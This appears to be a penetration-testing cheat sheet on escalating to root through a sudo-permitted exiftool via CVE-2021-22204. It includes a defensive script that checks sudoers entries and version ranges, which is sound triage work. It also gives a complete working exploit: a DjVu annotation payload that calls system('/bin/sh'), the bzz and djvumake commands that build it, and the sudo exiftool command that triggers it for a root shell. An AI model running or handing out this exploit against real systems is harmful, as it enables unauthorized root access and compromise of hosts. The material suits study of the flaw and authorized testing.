# Sudo Exiftool Privilege Escalation

### Investigation

```sh
(root) NOPASSWD: /usr/local/bin/exiftool
```

If we can execute the **"exiftool"** command as root via sudo, we may be able to escalate privileges.


### Arbitrary Code Execution (CVE-2021-22204) version 7.44+

Reference: <https://vk9-sec.com/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204/>

Check the exiftool version.\
If the exiftool version is later than **7.44**, we can execute arbitrary code.

```bash
exiftool -ver
```
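For triage from the defender's side, the following added example (not part of the original notes) flags sudoers entries that allow exiftool and classifies a version string against the affected range; CVE-2021-22204 was fixed in ExifTool 12.24, so 7.44 through 12.23 are treated as vulnerable. The function names and the sample input are hypothetical and constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original notes. All function names are hypothetical.
# Affected range used here: ExifTool 7.44 through 12.23 (CVE-2021-22204 was fixed in 12.24).

# Turn "MAJOR.MINOR" into a comparable integer (12.23 -> 1223); fail on anything else.
ver_to_int() {
    printf '%s\n' "$1" | grep -Eq '^[0-9]+\.[0-9]{1,2}$' || return 1
    major=${1%%.*}
    minor=${1#*.}
    # ExifTool versions are decimal numbers, so "12.5" means "12.50".
    if [ "${#minor}" -eq 1 ]; then minor="${minor}0"; fi
    # Strip leading zeros so the result is never read as octal.
    n=$(printf '%s%s\n' "$major" "$minor" | sed 's/^0*//')
    echo "${n:-0}"
}

# Print vulnerable / not-affected / unknown for a version string from `exiftool -ver`.
cve_2021_22204_status() {
    v=$(ver_to_int "$1") || { echo "unknown"; return 2; }
    if [ "$v" -ge 744 ] && [ "$v" -lt 1224 ]; then
        echo "vulnerable"
    else
        echo "not-affected"
    fi
}

# Read `sudo -l` output on stdin and print every allowed path whose basename is exiftool.
sudo_exiftool_paths() {
    tr ', \t' '\n\n\n' | grep -E '^/([^/]+/)*exiftool$' | sort -u
}

# Constructed sample input; on a real host pipe the output of `sudo -l` in instead.
SAMPLE_SUDO_L='User www-data may run the following commands on host:
    (root) NOPASSWD: /usr/local/bin/exiftool'
SAMPLE_VERSION='12.23'   # constructed; normally "$(exiftool -ver)"

printf '%s\n' "$SAMPLE_SUDO_L" | sudo_exiftool_paths | while read -r path; do
    echo "sudoers allows $path as root; version $SAMPLE_VERSION is $(cve_2021_22204_status "$SAMPLE_VERSION")"
done
```

A `vulnerable` or `unknown` result on a host where exiftool appears in sudoers is the case to fix, by upgrading to 12.24 or later or by removing the sudoers entry.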

#### Exploitation

On the local machine, create the payload in a file named **"exploit"**.

```bash
(metadata "\c${system('/bin/sh')};")
```

Next, compress the file.

```bash
bzz exploit exploit.bzz
```

Then create the DjVu file using the compressed file.

```bash
sudo apt install -y djvulibre-bin
# INFO: Create the initial information chunk.
# BGjp: Create a JPEG background chunk.
# ANTz: Write the compressed annotation chunk with the input file.
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=exploit.bzz
```

Now we have the **"exploit.djvu"** file.\
Transfer the file to the target machine and run exiftool as root on the DjVu file.

```bash
sudo /usr/local/bin/exiftool exploit.djvu
```

We should get a root shell.

